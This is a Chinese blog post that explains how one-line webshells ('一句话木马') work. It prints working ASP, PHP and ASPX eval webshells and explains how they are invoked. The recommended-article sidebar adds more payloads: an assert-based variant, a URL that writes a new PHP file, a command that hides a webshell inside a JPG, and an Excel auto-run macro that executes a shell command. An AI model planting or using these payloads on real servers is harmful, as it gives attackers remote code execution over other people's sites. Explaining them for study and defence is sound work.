一句话木马是如何被执行的?

最新推荐文章于 2024-06-09 15:59:40 发布
最新推荐文章于 2024-06-09 15:59:40 发布
阅读量2.9k 收藏 9
点赞数 3
分类专栏: 杂谈 文章标签: 一句话木马 eval eval函数 小马与大马 木马
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40950781/article/details/99709933
版权

一句话木马是如何被执行的

0x01 什么是一句话

一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数种变形,但本质是不变的:木马的函数执行了我们发送的命令。

0x02 最最典型的一句话小马

asp一句话:<%eval request("heroes")%>
php一句话: <?php @eval($_POST[value]);?>
aspx一句话:<%@ Page Language="Jscript"%>
			 <%eval(Request.Item["value"])%>

一句话木马短小精悍,格式千变万化,因为总是被waf拦截,所以一句话格式可以进行无数种变化绕过waf,可谓是道高一尺、魔高一丈!

0x03 大马与小马

小马特点:小马体积小,容易隐蔽,隐蔽性强,最重要的在于能与图片结合在一起上传之后可以利用Nginx或者iis6的解析漏洞来运行, 不过功能少,一般只有上传功能。

大马特点:大马体积大,一般在50k以上。功能多,一般都包括提权功能,磁盘管理,数据库连接,执行命令甚至有些具备自带提权功能和压缩,解压缩网站程序的功能。隐蔽性不好,而大多代码如果不加密的话容易被杀毒软件查杀。

0x04 一句话小马是如何执行的呢

我们可以通过GET 、POST 、COOKIE 这三种方式向一个网站提交数据,一句话木马用$ _GET[’ ‘]、$ _POST[’ ‘]、$ _COOKIE[’ '] 接收我们传递的数据,并把接收的数据 传递给一句话木马中执行命令的函数,进而执行命令。

所以看到的经典一句话木马大多都是只有两个部分,一个是可以执行代码的函数部分,一个是接收数据的部分。

就像是这样:<?php @eval($_POST['a']);?>执行命令的函数(接收的数据)

举个例子: <?php @eval($_POST['a']);?>

其中eval就是执行命令的函数,$_POST[‘a’]就是接收的数据。

eval函数把接收的数据当作php代码来执行。

这样我们就能够让插了一句话木马的网站执行我们传递过去的任意php语句。

这便是一句话木马的强大之处。

因为木马是接收post请求中 “a” 的数据( $_POST[‘a’]),所以我们必须以post方法发送数据并且将我们要执行的代码赋值给“a”。

如果把木马中的post替换成get,那么我么就需要以GET方法发送“a”,(就像这样: http://127.0.0.1/test.php?a=phpinfo(); )我就不再另行演示了。

litchi125
关注
  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php图片一句话木马使用方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
02-25 2307
php图片一句话木马使用方法,PHP一句话: 1、标准的写法,直接通过eval执行php代码@eval ($_POST['code']); 2、动态执行assert生成一个木马文件(隐藏性最好的一种)@$_GET['a']($_GET['code']); 3、使用方法:从url中传入下面参数执行后会在当前目录生成一个c.php的文件/index.php?a=assert&code=${fputs%28fopen%28base64_decode%28Y
webshell一句话
08-26
php,jsp,asp等脚本的常用一句话拿webshell,然后用菜刀连接即可
webshell基本原理和使用(一句话木马实践)
最新发布
m0_65853019的博客
06-09 1395
webshell的基本原理和使用
一句话图片木马
热门推荐
qq_44111753的博客
08-20 1万+
一句话图片木马 一、准备图片木马 1、准备任意图片pho.jpg 2、准备木马文件hack.php <?php @eval($_POST['hack']);?> 3、利用系统命令,将木马复制到图片文件中,产生图片木马hack.jpg copy pho.jpg/b+hack.php/a hack.jpg b二进制格式,a为ASCII 二、上传图片 三、利用文件包含漏洞解析图片木马(没有文件包含漏洞图片木马将无法执行) 1、 右键图片复制图片地址,找到图片木马具体位置(upload//4820
一句话木马实践
wjj985666的博客
11-16 700
POST里面的就是我们的链接密码,wjj是参数,这句话就是一个PHP一句话木马。3、复制木马文件上传的地址 使用中国蚁剑 右键添加数据 蚁剑的安装及使用教程可以自行查找。首先要把我们的一句话木马生成为一个文件,把文件名后缀改为.php,一句话木马就形成了。基本原理:运用文件上传漏洞往目标网站中上传一句话木马。密码为函数的$_POST['wjj']里面的wjj。之后通过dvwa平台的文件上传文件,实践木马。2、打开File Upload上传木马文件。首先用记事本创建一个简单的一句话木马
一句话***(webshell)是如何执行命令的
weixin_34381687的博客
06-16 1886
      在很多的***过程中,***人员会上传一句话***(简称webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话***到底是如何执行的呢,下面我们就对webshell进行一个简单的分析。首先我们先看一个原始而又简单的php一句话***。&lt;?php @eval($_POST['cmd']); ?&gt;看到这里不得不赞美前...
php一句话图片木马怎么运行,php型一句话木马怎么写
weixin_30231153的博客
03-10 1685
php型一句话木马怎么写?PHP一句话木马一:关于PHP的一句话木马
图片写入一句话木马
qq_53065516的博客
03-28 6439
图片制作一句话木马: 1:选择一个图片用工具打开,winhex或者其他工具都可以,例如我选取一张图片用winhex打开,然后在其后写入一句话木马,在这里我的一句话木马是:<?php @eval($_POST['pass']);?> 可以发现成功写入。 将此文件上传入dvwa后,在D:\phpstudy_pro\WWW\DVWA-master\hackable\uploads会发现出现我修改后的图片1.jpg 此时dvwa出现/…/hackable/uploads/1.jpg succesf
如何使用命令行合成一句话图片木马
dhgogogogogogo的博客
11-28 3286
简单的合成一句话图片木马的方法,除此之外,还可以使用Photoshop合成
php一句话图片运行,【后端开发】php一句话图片木马怎么解析
weixin_42348026的博客
03-11 652
一句话木马解析首先,学习渗透时,木马大概也就三种:大马小马、一句话。常见的一句话:这个应该是最常见的了...看一下他的组成.首先是一个eval函数,其次是post提交一个参数为x的值.首先我们看看eval函数是干什么的。官方说明:eval() 函数把字符串按照 PHP 代码来计算。该字符串必须是合法的 PHP 代码,且必须以分号结尾。如果没有在代码字符串中调用 return 语句,则返回 NU...
Web安全-一句话木马
jennycisp的博客
12-25 3266
在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢?【点击免费领取】CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》?基本原理】利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过中国菜刀即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语句字符串什么的全都当做代码执行。表示从页面中获得attack这个参数值。
一句话木马该怎么实现?现在就带你了解
m0_59598029的博客
02-23 889
一直以来,Java一句话木马都是采用打入字节码defineClass实现的。这种方法的优势是可以完整的打进去一个类,可以几乎实现Java上的所有功能。不足之处就是Payload过于巨大,并且不像脚本语言一样方便修改。并且还存在很多特征,例如继承ClassLoader,反射调用defineClass等。本在这里提出一种Java一句话木马:利用Java中JS引擎实现的一句话木马。基于JS引擎的Java一句话体积更小,变化种类更多,使用起来更灵活。
一句话木马是什么?代码实例及绕过方法
白帽子凯哥聊黑客
12-19 1339
一句话木马是指一种短小的、通常只有一行代码的恶意软件,它被用来在目标系统中执行攻击者的命令或代码。这种类型的木马通常通过各种途径被注入到目标系统中,一旦成功运行,攻击者就可以远程控制受感染的系统。一句话木马的目的包括窃取敏感信息、执行恶意操作、建立持久性访问等。这种木马的特点是简洁、隐蔽,使得攻击者能够轻松地操控目标系统。
web渗透_一句话木马(webshell)_dvwa环境
摸鱼域的空气。
04-04 8108
厄薇娅·瑞尔说,今天是个好日子。 一、什么是一句话木马 <?php @eval($_POST['a']); ?> 先来一段简单的一句话木马,解析下它的构造: @这个符号的作用是抵制错误提示;eval()函数将接收一个字符串参数,并将这个字符串作为命令语句执行;$_REQUEST['a']从请求参数中得到a这个参数的值,请求参数有两种:GET和POST;a参数名(自定义) 而这段代码的意思就是:用POST方法接收变量a,把变量a里面的字符串当做php代码来执行。 也就是说,你想执行什么代码,.
一句话php木马
weixin_63231007的博客
03-20 1603
1.什么是一句话木马? :一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马函数执行了我们发送的命令。 2.如何发送命令,执行命令? :我们可以通过 GET、POST、COOKIE这三种方式向一个网站提交数据,一句话木马用 $_GET[' ']、$_POST[' ']、$_COOKIE[' ']接收我们传递的数据,并把接收的数据传递给一句话木马执行命令的函数,进而执行命令。 所以看到的...
文件上传漏洞------一句话木马原理解析
m0_69151365的博客
03-11 2131
这是一个最简单的一句话木马,我们用GET传参接受了两个参数,其最终目的是构造出:assert($_GET['1']) -> assert(eval(phpinfo()))这样的语句。我们也可以直接构造eval,但是很容易被杀,在我个人电脑上我们可以关闭保护软件,但是我们可以关闭网站服务器的杀毒软件吗?这串代码是在对上一个代码进行base64解码,完了我们还要执行assert(eval(muma)) 这就是一句话木马的总体原理。我们设置成不允许,刷新靶场再次上传木马文件发现上传成功了。接下来就开始抓包了。
Aspx一句话木马使用
Magicbreaker的专栏
01-15 8750
Aspx一句话木马使用1.相当于ASP的一句话木马:程序代码alter database pubs set RECOVERY FULL--create table pubs.dbo.cmd(a image)backup log pubs to disk = c:/TM with initinsert into pubs.dbo.cmd(a) values ( )ba
excel一句话木马
01-26
Excel一句话木马是一种利用Excel文件进行攻击的恶意软件。它通过在Excel文件中嵌入恶意宏代码来实现攻击目标。当用户打开包含恶意宏代码的Excel文件时,该代码会在用户的计算机上执行,并可能导致系统被入侵或数据被窃取。 以下是一个示例,展示了如何在Excel中创建一句话木马: ```vba Sub Auto_Open() Dim shell As Object Set shell = CreateObject("WScript.Shell") shell.Run "cmd.exe /c your_malicious_command", 0 End Sub ``` 在上述示例中,恶意宏代码使用`WScript.Shell`对象创建一个命令行窗口,并执行`your_malicious_command`命令。这个命令可以是任何你想要在受害者计算机上执行的恶意操作。 请注意,使用恶意宏代码进行攻击是非法的,并且可能导致法律责任。为了保护自己的计算机安全,建议不要打开来自不信任来源的Excel文件,并确保你的计算机有最新的安全补丁和防病毒软件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值